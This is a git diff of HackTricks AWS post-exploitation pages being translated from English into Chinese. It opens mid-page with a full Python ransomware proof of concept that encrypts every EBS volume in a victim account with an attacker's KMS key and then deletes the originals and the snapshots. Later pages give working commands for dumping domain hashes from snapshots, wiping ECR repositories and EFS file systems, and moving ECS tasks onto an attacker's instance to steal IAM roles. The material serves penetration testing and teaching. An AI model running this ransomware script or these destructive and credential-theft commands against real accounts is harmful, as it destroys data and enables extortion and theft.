ARN值。该脚本将对目标AWS账户中所有EC2实例附加的所有可用EBS卷进行加密副本,然后停止每个EC2实例,分离原始EBS卷,删除它们,最后删除在此过程中使用的所有快照。这将只在目标“受害者”账户中留下加密的EBS卷。仅在测试环境中使用此脚本,它是破坏性的,并将删除所有原始EBS卷。你可以使用所使用的KMS密钥恢复它们,并通过快照将它们恢复到原始状态,但我只是想让你意识到,这在最终是一个勒索软件的概念验证。 ``` import boto3 import argparse from botocore.exceptions import ClientError def enumerate_ec2_instances(ec2_client): - instances = ec2_client.describe_instances() - instance_volumes = {} - for reservation in instances['Reservations']: - for instance in reservation['Instances']: - instance_id = instance['InstanceId'] - volumes = [vol['Ebs']['VolumeId'] for vol in instance['BlockDeviceMappings'] if 'Ebs' in vol] - instance_volumes[instance_id] = volumes - return instance_volumes +instances = ec2_client.describe_instances() +instance_volumes = {} +for reservation in instances['Reservations']: +for instance in reservation['Instances']: +instance_id = instance['InstanceId'] +volumes = [vol['Ebs']['VolumeId'] for vol in instance['BlockDeviceMappings'] if 'Ebs' in vol] +instance_volumes[instance_id] = volumes +return instance_volumes def snapshot_volumes(ec2_client, volumes): - snapshot_ids = [] - for volume_id in volumes: - snapshot = ec2_client.create_snapshot(VolumeId=volume_id) - snapshot_ids.append(snapshot['SnapshotId']) - return snapshot_ids +snapshot_ids = [] +for volume_id in volumes: +snapshot = ec2_client.create_snapshot(VolumeId=volume_id) +snapshot_ids.append(snapshot['SnapshotId']) +return snapshot_ids def wait_for_snapshots(ec2_client, snapshot_ids): - for snapshot_id in snapshot_ids: - ec2_client.get_waiter('snapshot_completed').wait(SnapshotIds=[snapshot_id]) +for snapshot_id in snapshot_ids: +ec2_client.get_waiter('snapshot_completed').wait(SnapshotIds=[snapshot_id]) def create_encrypted_volumes(ec2_client, snapshot_ids, kms_key_arn): - new_volume_ids = [] - for snapshot_id in snapshot_ids: - snapshot_info = ec2_client.describe_snapshots(SnapshotIds=[snapshot_id])['Snapshots'][0] - volume_id = snapshot_info['VolumeId'] - volume_info = ec2_client.describe_volumes(VolumeIds=[volume_id])['Volumes'][0] - availability_zone = volume_info['AvailabilityZone'] +new_volume_ids = [] +for snapshot_id in snapshot_ids: +snapshot_info = ec2_client.describe_snapshots(SnapshotIds=[snapshot_id])['Snapshots'][0] +volume_id = snapshot_info['VolumeId'] +volume_info = ec2_client.describe_volumes(VolumeIds=[volume_id])['Volumes'][0] +availability_zone = volume_info['AvailabilityZone'] - volume = ec2_client.create_volume(SnapshotId=snapshot_id, AvailabilityZone=availability_zone, - Encrypted=True, KmsKeyId=kms_key_arn) - new_volume_ids.append(volume['VolumeId']) - return new_volume_ids +volume = ec2_client.create_volume(SnapshotId=snapshot_id, AvailabilityZone=availability_zone, +Encrypted=True, KmsKeyId=kms_key_arn) +new_volume_ids.append(volume['VolumeId']) +return new_volume_ids def stop_instances(ec2_client, instance_ids): - for instance_id in instance_ids: - try: - instance_description = ec2_client.describe_instances(InstanceIds=[instance_id]) - instance_state = instance_description['Reservations'][0]['Instances'][0]['State']['Name'] +for instance_id in instance_ids: +try: +instance_description = ec2_client.describe_instances(InstanceIds=[instance_id]) +instance_state = instance_description['Reservations'][0]['Instances'][0]['State']['Name'] - if instance_state == 'running': - ec2_client.stop_instances(InstanceIds=[instance_id]) - print(f"Stopping instance: {instance_id}") - ec2_client.get_waiter('instance_stopped').wait(InstanceIds=[instance_id]) - print(f"Instance {instance_id} stopped.") - else: - print(f"Instance {instance_id} is not in a state that allows it to be stopped (current state: {instance_state}).") +if instance_state == 'running': +ec2_client.stop_instances(InstanceIds=[instance_id]) +print(f"Stopping instance: {instance_id}") +ec2_client.get_waiter('instance_stopped').wait(InstanceIds=[instance_id]) +print(f"Instance {instance_id} stopped.") +else: +print(f"Instance {instance_id} is not in a state that allows it to be stopped (current state: {instance_state}).") - except ClientError as e: - print(f"Error stopping instance {instance_id}: {e}") +except ClientError as e: +print(f"Error stopping instance {instance_id}: {e}") def detach_and_delete_volumes(ec2_client, volumes): - for volume_id in volumes: - try: - ec2_client.detach_volume(VolumeId=volume_id) - ec2_client.get_waiter('volume_available').wait(VolumeIds=[volume_id]) - ec2_client.delete_volume(VolumeId=volume_id) - print(f"Deleted volume: {volume_id}") - except ClientError as e: - print(f"Error detaching or deleting volume {volume_id}: {e}") +for volume_id in volumes: +try: +ec2_client.detach_volume(VolumeId=volume_id) +ec2_client.get_waiter('volume_available').wait(VolumeIds=[volume_id]) +ec2_client.delete_volume(VolumeId=volume_id) +print(f"Deleted volume: {volume_id}") +except ClientError as e: +print(f"Error detaching or deleting volume {volume_id}: {e}") def delete_snapshots(ec2_client, snapshot_ids): - for snapshot_id in snapshot_ids: - try: - ec2_client.delete_snapshot(SnapshotId=snapshot_id) - print(f"Deleted snapshot: {snapshot_id}") - except ClientError as e: - print(f"Error deleting snapshot {snapshot_id}: {e}") +for snapshot_id in snapshot_ids: +try: +ec2_client.delete_snapshot(SnapshotId=snapshot_id) +print(f"Deleted snapshot: {snapshot_id}") +except ClientError as e: +print(f"Error deleting snapshot {snapshot_id}: {e}") def replace_volumes(ec2_client, instance_volumes): - instance_ids = list(instance_volumes.keys()) - stop_instances(ec2_client, instance_ids) +instance_ids = list(instance_volumes.keys()) +stop_instances(ec2_client, instance_ids) - all_volumes = [vol for vols in instance_volumes.values() for vol in vols] - detach_and_delete_volumes(ec2_client, all_volumes) +all_volumes = [vol for vols in instance_volumes.values() for vol in vols] +detach_and_delete_volumes(ec2_client, all_volumes) def ebs_lock(access_key, secret_key, region, kms_key_arn): - ec2_client = boto3.client('ec2', aws_access_key_id=access_key, aws_secret_access_key=secret_key, region_name=region) +ec2_client = boto3.client('ec2', aws_access_key_id=access_key, aws_secret_access_key=secret_key, region_name=region) - instance_volumes = enumerate_ec2_instances(ec2_client) - all_volumes = [vol for vols in instance_volumes.values() for vol in vols] - snapshot_ids = snapshot_volumes(ec2_client, all_volumes) - wait_for_snapshots(ec2_client, snapshot_ids) - create_encrypted_volumes(ec2_client, snapshot_ids, kms_key_arn) # New encrypted volumes are created but not attached - replace_volumes(ec2_client, instance_volumes) # Stops instances, detaches and deletes old volumes - delete_snapshots(ec2_client, snapshot_ids) # Optionally delete snapshots if no longer needed +instance_volumes = enumerate_ec2_instances(ec2_client) +all_volumes = [vol for vols in instance_volumes.values() for vol in vols] +snapshot_ids = snapshot_volumes(ec2_client, all_volumes) +wait_for_snapshots(ec2_client, snapshot_ids) +create_encrypted_volumes(ec2_client, snapshot_ids, kms_key_arn) # New encrypted volumes are created but not attached +replace_volumes(ec2_client, instance_volumes) # Stops instances, detaches and deletes old volumes +delete_snapshots(ec2_client, snapshot_ids) # Optionally delete snapshots if no longer needed def parse_arguments(): - parser = argparse.ArgumentParser(description='EBS Volume Encryption and Replacement Tool') - parser.add_argument('--access-key', required=True, help='AWS Access Key ID') - parser.add_argument('--secret-key', required=True, help='AWS Secret Access Key') - parser.add_argument('--region', required=True, help='AWS Region') - parser.add_argument('--kms-key-arn', required=True, help='KMS Key ARN for EBS volume encryption') - return parser.parse_args() +parser = argparse.ArgumentParser(description='EBS Volume Encryption and Replacement Tool') +parser.add_argument('--access-key', required=True, help='AWS Access Key ID') +parser.add_argument('--secret-key', required=True, help='AWS Secret Access Key') +parser.add_argument('--region', required=True, help='AWS Region') +parser.add_argument('--kms-key-arn', required=True, help='KMS Key ARN for EBS volume encryption') +return parser.parse_args() def main(): - args = parse_arguments() - ec2_client = boto3.client('ec2', aws_access_key_id=args.access_key, aws_secret_access_key=args.secret_key, region_name=args.region) +args = parse_arguments() +ec2_client = boto3.client('ec2', aws_access_key_id=args.access_key, aws_secret_access_key=args.secret_key, region_name=args.region) - instance_volumes = enumerate_ec2_instances(ec2_client) - all_volumes = [vol for vols in instance_volumes.values() for vol in vols] - snapshot_ids = snapshot_volumes(ec2_client, all_volumes) - wait_for_snapshots(ec2_client, snapshot_ids) - create_encrypted_volumes(ec2_client, snapshot_ids, args.kms_key_arn) - replace_volumes(ec2_client, instance_volumes) - delete_snapshots(ec2_client, snapshot_ids) +instance_volumes = enumerate_ec2_instances(ec2_client) +all_volumes = [vol for vols in instance_volumes.values() for vol in vols] +snapshot_ids = snapshot_volumes(ec2_client, all_volumes) +wait_for_snapshots(ec2_client, snapshot_ids) +create_encrypted_volumes(ec2_client, snapshot_ids, args.kms_key_arn) +replace_volumes(ec2_client, instance_volumes) +delete_snapshots(ec2_client, snapshot_ids) if __name__ == "__main__": - main() +main() ``` - {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.md index 7a9a19cc4..95a90a179 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.md @@ -1,9 +1,8 @@ -# AWS - EBS Snapshot Dump +# AWS - EBS 快照转储 {{#include ../../../../banners/hacktricks-training.md}} -## Checking a snapshot locally - +## 本地检查快照 ```bash # Install dependencies pip install 'dsnap[cli]' @@ -32,10 +31,8 @@ cd dsnap make docker/build IMAGE=".img" make docker/run #With the snapshot downloaded ``` - > [!CAUTION] -> **Note** that `dsnap` will not allow you to download public snapshots. To circumvent this, you can make a copy of the snapshot in your personal account, and download that: - +> **注意** `dsnap` 不允许您下载公共快照。要绕过此限制,您可以在您的个人账户中复制快照,然后下载该快照: ```bash # Copy the snapshot aws ec2 copy-snapshot --source-region us-east-2 --source-snapshot-id snap-09cf5d9801f231c57 --destination-region us-east-2 --description "copy of snap-09cf5d9801f231c57" @@ -49,59 +46,55 @@ dsnap --region us-east-2 get snap-027da41be451109da # Delete the snapshot after downloading aws ec2 delete-snapshot --snapshot-id snap-027da41be451109da --region us-east-2 ``` +有关此技术的更多信息,请查看原始研究 [https://rhinosecuritylabs.com/aws/exploring-aws-ebs-snapshots/](https://rhinosecuritylabs.com/aws/exploring-aws-ebs-snapshots/) -For more info on this technique check the original research in [https://rhinosecuritylabs.com/aws/exploring-aws-ebs-snapshots/](https://rhinosecuritylabs.com/aws/exploring-aws-ebs-snapshots/) - -You can do this with Pacu using the module [ebs\_\_download_snapshots](https://github.com/RhinoSecurityLabs/pacu/wiki/Module-Details#ebs__download_snapshots) - -## Checking a snapshot in AWS +您可以使用 Pacu 的模块 [ebs\_\_download_snapshots](https://github.com/RhinoSecurityLabs/pacu/wiki/Module-Details#ebs__download_snapshots) 来执行此操作 +## 在 AWS 中检查快照 ```bash aws ec2 create-volume --availability-zone us-west-2a --region us-west-2 --snapshot-id snap-0b49342abd1bdcb89 ``` +**在您控制的 EC2 虚拟机中挂载它**(它必须与备份的副本位于同一区域): -**Mount it in a EC2 VM under your control** (it has to be in the same region as the copy of the backup): +步骤 1:通过前往 EC2 –> 卷,创建一个您喜欢的大小和类型的新卷。 -Step 1: A new volume of your preferred size and type is to be created by heading over to EC2 –> Volumes. +要执行此操作,请遵循以下命令: -To be able to perform this action, follow these commands: +- 创建一个 EBS 卷以附加到 EC2 实例。 +- 确保 EBS 卷和实例位于同一区域。 -- Create an EBS volume to attach to the EC2 instance. -- Ensure that the EBS volume and the instance are in the same zone. +步骤 2:通过右键单击创建的卷,选择“附加卷”选项。 -Step 2: The "attach volume" option is to be selected by right-clicking on the created volume. +步骤 3:从实例文本框中选择实例。 -Step 3: The instance from the instance text box is to be selected. +要执行此操作,请使用以下命令: -To be able to perform this action, use the following command: +- 附加 EBS 卷。 -- Attach the EBS volume. +步骤 4:登录到 EC2 实例,并使用命令 `lsblk` 列出可用磁盘。 -Step 4: Login to the EC2 instance and list the available disks using the command `lsblk`. +步骤 5:使用命令 `sudo file -s /dev/xvdf` 检查卷是否有任何数据。 -Step 5: Check if the volume has any data using the command `sudo file -s /dev/xvdf`. +如果上述命令的输出显示 "/dev/xvdf: data",则表示卷是空的。 -If the output of the above command shows "/dev/xvdf: data", it means the volume is empty. +步骤 6:使用命令 `sudo mkfs -t ext4 /dev/xvdf` 将卷格式化为 ext4 文件系统。或者,您也可以使用命令 `sudo mkfs -t xfs /dev/xvdf` 使用 xfs 格式。请注意,您应该使用 ext4 或 xfs 中的任意一种。 -Step 6: Format the volume to the ext4 filesystem using the command `sudo mkfs -t ext4 /dev/xvdf`. Alternatively, you can also use the xfs format by using the command `sudo mkfs -t xfs /dev/xvdf`. Please note that you should use either ext4 or xfs. +步骤 7:创建一个您选择的目录以挂载新的 ext4 卷。例如,您可以使用名称 "newvolume"。 -Step 7: Create a directory of your choice to mount the new ext4 volume. For example, you can use the name "newvolume". +要执行此操作,请使用命令 `sudo mkdir /newvolume`。 -To be able to perform this action, use the command `sudo mkdir /newvolume`. +步骤 8:使用命令 `sudo mount /dev/xvdf /newvolume/` 将卷挂载到 "newvolume" 目录。 -Step 8: Mount the volume to the "newvolume" directory using the command `sudo mount /dev/xvdf /newvolume/`. +步骤 9:切换到 "newvolume" 目录并检查磁盘空间以验证卷挂载。 -Step 9: Change directory to the "newvolume" directory and check the disk space to validate the volume mount. +要执行此操作,请使用以下命令: -To be able to perform this action, use the following commands: +- 切换到 `/newvolume`。 +- 使用命令 `df -h .` 检查磁盘空间。此命令的输出应显示 "newvolume" 目录中的可用空间。 -- Change directory to `/newvolume`. -- Check the disk space using the command `df -h .`. The output of this command should show the free space in the "newvolume" directory. - -You can do this with Pacu using the module `ebs__explore_snapshots`. - -## Checking a snapshot in AWS (using cli) +您可以使用 Pacu 通过模块 `ebs__explore_snapshots` 来完成此操作。 +## 在 AWS 中检查快照(使用 cli) ```bash aws ec2 create-volume --availability-zone us-west-2a --region us-west-2 --snapshot-id @@ -127,19 +120,14 @@ sudo mount /dev/xvdh1 /mnt ls /mnt ``` - ## Shadow Copy -Any AWS user possessing the **`EC2:CreateSnapshot`** permission can steal the hashes of all domain users by creating a **snapshot of the Domain Controller** mounting it to an instance they control and **exporting the NTDS.dit and SYSTEM** registry hive file for use with Impacket's secretsdump project. +任何拥有 **`EC2:CreateSnapshot`** 权限的 AWS 用户都可以通过创建 **域控制器的快照**,将其挂载到他们控制的实例上,并 **导出 NTDS.dit 和 SYSTEM** 注册表蜂巢文件,以窃取所有域用户的哈希值,供 Impacket 的 secretsdump 项目使用。 -You can use this tool to automate the attack: [https://github.com/Static-Flow/CloudCopy](https://github.com/Static-Flow/CloudCopy) or you could use one of the previous techniques after creating a snapshot. +您可以使用此工具来自动化攻击:[https://github.com/Static-Flow/CloudCopy](https://github.com/Static-Flow/CloudCopy),或者在创建快照后使用之前的技术之一。 ## References - [https://devopscube.com/mount-ebs-volume-ec2-instance/](https://devopscube.com/mount-ebs-volume-ec2-instance/) {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-malicious-vpc-mirror.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-malicious-vpc-mirror.md index eb3b5f33f..765c1d31e 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-malicious-vpc-mirror.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-malicious-vpc-mirror.md @@ -4,16 +4,12 @@ **Check** [**https://rhinosecuritylabs.com/aws/abusing-vpc-traffic-mirroring-in-aws**](https://rhinosecuritylabs.com/aws/abusing-vpc-traffic-mirroring-in-aws) **for further details of the attack!** -Passive network inspection in a cloud environment has been **challenging**, requiring major configuration changes to monitor network traffic. However, a new feature called “**VPC Traffic Mirroring**” has been introduced by AWS to simplify this process. With VPC Traffic Mirroring, network traffic within VPCs can be **duplicated** without installing any software on the instances themselves. This duplicated traffic can be sent to a network intrusion detection system (IDS) for **analysis**. +在云环境中进行被动网络检查一直是**具有挑战性的**,需要对网络流量进行重大配置更改。然而,AWS引入了一项名为“**VPC流量镜像**”的新功能,以简化此过程。通过VPC流量镜像,可以**复制**VPC内的网络流量,而无需在实例上安装任何软件。这些复制的流量可以发送到网络入侵检测系统(IDS)进行**分析**。 -To address the need for **automated deployment** of the necessary infrastructure for mirroring and exfiltrating VPC traffic, we have developed a proof-of-concept script called “**malmirror**”. This script can be used with **compromised AWS credentials** to set up mirroring for all supported EC2 instances in a target VPC. It is important to note that VPC Traffic Mirroring is only supported by EC2 instances powered by the AWS Nitro system, and the VPC mirror target must be within the same VPC as the mirrored hosts. +为了满足**自动部署**镜像和提取VPC流量所需基础设施的需求,我们开发了一个名为“**malmirror**”的概念验证脚本。该脚本可以与**被攻陷的AWS凭证**一起使用,以在目标VPC中为所有支持的EC2实例设置镜像。需要注意的是,VPC流量镜像仅支持由AWS Nitro系统提供支持的EC2实例,并且VPC镜像目标必须与被镜像主机位于同一VPC中。 -The **impact** of malicious VPC traffic mirroring can be significant, as it allows attackers to access **sensitive information** transmitted within VPCs. The **likelihood** of such malicious mirroring is high, considering the presence of **cleartext traffic** flowing through VPCs. Many companies use cleartext protocols within their internal networks for **performance reasons**, assuming traditional man-in-the-middle attacks are not possible. +恶意VPC流量镜像的**影响**可能是显著的,因为它允许攻击者访问在VPC中传输的**敏感信息**。考虑到VPC中存在**明文流量**,这种恶意镜像的**可能性**很高。许多公司在其内部网络中使用明文协议以**性能原因**,假设传统的中间人攻击是不可能的。 -For more information and access to the [**malmirror script**](https://github.com/RhinoSecurityLabs/Cloud-Security-Research/tree/master/AWS/malmirror), it can be found on our **GitHub repository**. The script automates and streamlines the process, making it **quick, simple, and repeatable** for offensive research purposes. +有关更多信息和访问[**malmirror脚本**](https://github.com/RhinoSecurityLabs/Cloud-Security-Research/tree/master/AWS/malmirror),可以在我们的**GitHub存储库**中找到。该脚本自动化并简化了该过程,使其对攻击性研究目的**快速、简单且可重复**。 {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ecr-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ecr-post-exploitation.md index a971ea769..74562fa02 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ecr-post-exploitation.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ecr-post-exploitation.md @@ -1,17 +1,16 @@ -# AWS - ECR Post Exploitation +# AWS - ECR 后期利用 {{#include ../../../banners/hacktricks-training.md}} ## ECR -For more information check +有关更多信息,请查看 {{#ref}} ../aws-services/aws-ecr-enum.md {{#endref}} -### Login, Pull & Push - +### 登录、拉取和推送 ```bash # Docker login into ecr ## For public repo (always use us-east-1) @@ -38,17 +37,16 @@ docker push .dkr.ecr..amazonaws.com/purplepanda:latest # Downloading without Docker # List digests aws ecr batch-get-image --repository-name level2 \ - --registry-id 653711331788 \ - --image-ids imageTag=latest | jq '.images[].imageManifest | fromjson' +--registry-id 653711331788 \ +--image-ids imageTag=latest | jq '.images[].imageManifest | fromjson' ## Download a digest aws ecr get-download-url-for-layer \ - --repository-name level2 \ - --registry-id 653711331788 \ - --layer-digest "sha256:edfaad38ac10904ee76c81e343abf88f22e6cfc7413ab5a8e4aeffc6a7d9087a" +--repository-name level2 \ +--registry-id 653711331788 \ +--layer-digest "sha256:edfaad38ac10904ee76c81e343abf88f22e6cfc7413ab5a8e4aeffc6a7d9087a" ``` - -After downloading the images you should **check them for sensitive info**: +下载图像后,您应该**检查它们是否包含敏感信息**: {{#ref}} https://book.hacktricks.xyz/generic-methodologies-and-resources/basic-forensic-methodology/docker-forensics @@ -56,25 +54,24 @@ https://book.hacktricks.xyz/generic-methodologies-and-resources/basic-forensic-m ### `ecr:PutLifecyclePolicy` | `ecr:DeleteRepository` | `ecr-public:DeleteRepository` | `ecr:BatchDeleteImage` | `ecr-public:BatchDeleteImage` -An attacker with any of these permissions can **create or modify a lifecycle policy to delete all images in the repository** and then **delete the entire ECR repository**. This would result in the loss of all container images stored in the repository. - +拥有这些权限的攻击者可以**创建或修改生命周期策略以删除存储库中的所有图像**,然后**删除整个 ECR 存储库**。这将导致存储库中所有容器图像的丢失。 ```bash bashCopy code# Create a JSON file with the malicious lifecycle policy echo '{ - "rules": [ - { - "rulePriority": 1, - "description": "Delete all images", - "selection": { - "tagStatus": "any", - "countType": "imageCountMoreThan", - "countNumber": 0 - }, - "action": { - "type": "expire" - } - } - ] +"rules": [ +{ +"rulePriority": 1, +"description": "Delete all images", +"selection": { +"tagStatus": "any", +"countType": "imageCountMoreThan", +"countNumber": 0 +}, +"action": { +"type": "expire" +} +} +] }' > malicious_policy.json # Apply the malicious lifecycle policy to the ECR repository @@ -92,9 +89,4 @@ aws ecr batch-delete-image --repository-name your-ecr-repo-name --image-ids imag # Delete multiple images from the ECR public repository aws ecr-public batch-delete-image --repository-name your-ecr-repo-name --image-ids imageTag=latest imageTag=v1.0.0 ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation.md index 1d2fd80a5..54a2f7f6d 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation.md @@ -1,53 +1,48 @@ -# AWS - ECS Post Exploitation +# AWS - ECS 后期利用 {{#include ../../../banners/hacktricks-training.md}} ## ECS -For more information check: +有关更多信息,请查看: {{#ref}} ../aws-services/aws-ecs-enum.md {{#endref}} -### Host IAM Roles +### 主机 IAM 角色 -In ECS an **IAM role can be assigned to the task** running inside the container. **If** the task is run inside an **EC2** instance, the **EC2 instance** will have **another IAM** role attached to it.\ -Which means that if you manage to **compromise** an ECS instance you can potentially **obtain the IAM role associated to the ECR and to the EC2 instance**. For more info about how to get those credentials check: +在 ECS 中,**IAM 角色可以分配给在容器内运行的任务**。**如果**任务在 **EC2** 实例内运行,**EC2 实例**将附加 **另一个 IAM** 角色。\ +这意味着如果你成功 **攻陷** 一个 ECS 实例,你可能会 **获得与 ECR 和 EC2 实例相关联的 IAM 角色**。有关如何获取这些凭据的更多信息,请查看: {{#ref}} https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf {{#endref}} > [!CAUTION] -> Note that if the EC2 instance is enforcing IMDSv2, [**according to the docs**](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-metadata-v2-how-it-works.html), the **response of the PUT request** will have a **hop limit of 1**, making impossible to access the EC2 metadata from a container inside the EC2 instance. +> 请注意,如果 EC2 实例强制使用 IMDSv2, [**根据文档**](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-metadata-v2-how-it-works.html),**PUT 请求的响应**将具有 **跳数限制为 1**,使得无法从 EC2 实例内的容器访问 EC2 元数据。 -### Privesc to node to steal other containers creds & secrets +### 提权到节点以窃取其他容器的凭据和秘密 -But moreover, EC2 uses docker to run ECs tasks, so if you can escape to the node or **access the docker socket**, you can **check** which **other containers** are being run, and even **get inside of them** and **steal their IAM roles** attached. +此外,EC2 使用 docker 来运行 ECs 任务,因此如果你能够逃逸到节点或 **访问 docker 套接字**,你可以 **检查** 哪些 **其他容器** 正在运行,甚至可以 **进入它们** 并 **窃取** 附加的 IAM 角色。 -#### Making containers run in current host - -Furthermore, the **EC2 instance role** will usually have enough **permissions** to **update the container instance state** of the EC2 instances being used as nodes inside the cluster. An attacker could modify the **state of an instance to DRAINING**, then ECS will **remove all the tasks from it** and the ones being run as **REPLICA** will be **run in a different instance,** potentially inside the **attackers instance** so he can **steal their IAM roles** and potential sensitive info from inside the container. +#### 使容器在当前主机上运行 +此外,**EC2 实例角色**通常会拥有足够的 **权限** 来 **更新集群内作为节点使用的 EC2 实例的容器实例状态**。攻击者可以将 **实例的状态修改为 DRAINING**,然后 ECS 将 **从中移除所有任务**,而作为 **REPLICA** 运行的任务将 **在不同的实例中运行,** 可能在 **攻击者的实例** 内,这样他就可以 **窃取它们的 IAM 角色** 和潜在的敏感信息。 ```bash aws ecs update-container-instances-state \ - --cluster --status DRAINING --container-instances +--cluster --status DRAINING --container-instances ``` - -The same technique can be done by **deregistering the EC2 instance from the cluster**. This is potentially less stealthy but it will **force the tasks to be run in other instances:** - +相同的技术可以通过 **从集群中注销 EC2 实例** 来实现。这可能不那么隐蔽,但它将 **强制任务在其他实例中运行:** ```bash aws ecs deregister-container-instance \ - --cluster --container-instance --force +--cluster --container-instance --force ``` - -A final technique to force the re-execution of tasks is by indicating ECS that the **task or container was stopped**. There are 3 potential APIs to do this: - +一种强制重新执行任务的最终技术是通过指示ECS **任务或容器已停止**。有3个潜在的API可以做到这一点: ```bash # Needs: ecs:SubmitTaskStateChange aws ecs submit-task-state-change --cluster \ - --status STOPPED --reason "anything" --containers [...] +--status STOPPED --reason "anything" --containers [...] # Needs: ecs:SubmitContainerStateChange aws ecs submit-container-state-change ... @@ -55,13 +50,8 @@ aws ecs submit-container-state-change ... # Needs: ecs:SubmitAttachmentStateChanges aws ecs submit-attachment-state-changes ... ``` +### 从ECR容器中窃取敏感信息 -### Steal sensitive info from ECR containers - -The EC2 instance will probably also have the permission `ecr:GetAuthorizationToken` allowing it to **download images** (you could search for sensitive info in them). +EC2实例可能还具有权限`ecr:GetAuthorizationToken`,允许它**下载镜像**(您可以在其中搜索敏感信息)。 {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation.md index 35b644689..466275cf4 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation.md @@ -1,10 +1,10 @@ -# AWS - EFS Post Exploitation +# AWS - EFS 后期利用 {{#include ../../../banners/hacktricks-training.md}} ## EFS -For more information check: +有关更多信息,请查看: {{#ref}} ../aws-services/aws-efs-enum.md @@ -12,47 +12,35 @@ For more information check: ### `elasticfilesystem:DeleteMountTarget` -An attacker could delete a mount target, potentially disrupting access to the EFS file system for applications and users relying on that mount target. - +攻击者可以删除挂载目标,可能会干扰依赖该挂载目标的应用程序和用户对 EFS 文件系统的访问。 ```sql aws efs delete-mount-target --mount-target-id ``` - -**Potential Impact**: Disruption of file system access and potential data loss for users or applications. +**潜在影响**:文件系统访问中断和用户或应用程序的潜在数据丢失。 ### `elasticfilesystem:DeleteFileSystem` -An attacker could delete an entire EFS file system, which could lead to data loss and impact applications relying on the file system. - +攻击者可以删除整个 EFS 文件系统,这可能导致数据丢失并影响依赖该文件系统的应用程序。 ```perl aws efs delete-file-system --file-system-id ``` - -**Potential Impact**: Data loss and service disruption for applications using the deleted file system. +**潜在影响**:使用已删除文件系统的应用程序可能会导致数据丢失和服务中断。 ### `elasticfilesystem:UpdateFileSystem` -An attacker could update the EFS file system properties, such as throughput mode, to impact its performance or cause resource exhaustion. - +攻击者可以更新EFS文件系统属性,例如吞吐量模式,以影响其性能或导致资源耗尽。 ```sql aws efs update-file-system --file-system-id --provisioned-throughput-in-mibps ``` +**潜在影响**:文件系统性能下降或资源耗尽。 -**Potential Impact**: Degradation of file system performance or resource exhaustion. - -### `elasticfilesystem:CreateAccessPoint` and `elasticfilesystem:DeleteAccessPoint` - -An attacker could create or delete access points, altering access control and potentially granting themselves unauthorized access to the file system. +### `elasticfilesystem:CreateAccessPoint` 和 `elasticfilesystem:DeleteAccessPoint` +攻击者可以创建或删除访问点,改变访问控制,并可能授予自己对文件系统的未经授权访问。 ```arduino aws efs create-access-point --file-system-id --posix-user --root-directory aws efs delete-access-point --access-point-id ``` - -**Potential Impact**: Unauthorized access to the file system, data exposure or modification. +**潜在影响**:未经授权访问文件系统,数据泄露或修改。 {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.md index eb1f77f46..54d0c9047 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.md @@ -1,113 +1,104 @@ -# AWS - EKS Post Exploitation +# AWS - EKS 后期利用 {{#include ../../../banners/hacktricks-training.md}} ## EKS -For mor information check +有关更多信息,请查看 {{#ref}} ../aws-services/aws-eks-enum.md {{#endref}} -### Enumerate the cluster from the AWS Console +### 从 AWS 控制台枚举集群 -If you have the permission **`eks:AccessKubernetesApi`** you can **view Kubernetes objects** via AWS EKS console ([Learn more](https://docs.aws.amazon.com/eks/latest/userguide/view-workloads.html)). +如果您拥有权限 **`eks:AccessKubernetesApi`**,您可以通过 AWS EKS 控制台 **查看 Kubernetes 对象** ([了解更多](https://docs.aws.amazon.com/eks/latest/userguide/view-workloads.html))。 -### Connect to AWS Kubernetes Cluster - -- Easy way: +### 连接到 AWS Kubernetes 集群 +- 简单方法: ```bash # Generate kubeconfig aws eks update-kubeconfig --name aws-eks-dev ``` +- 不是那么简单的方法: -- Not that easy way: - -If you can **get a token** with **`aws eks get-token --name `** but you don't have permissions to get cluster info (describeCluster), you could **prepare 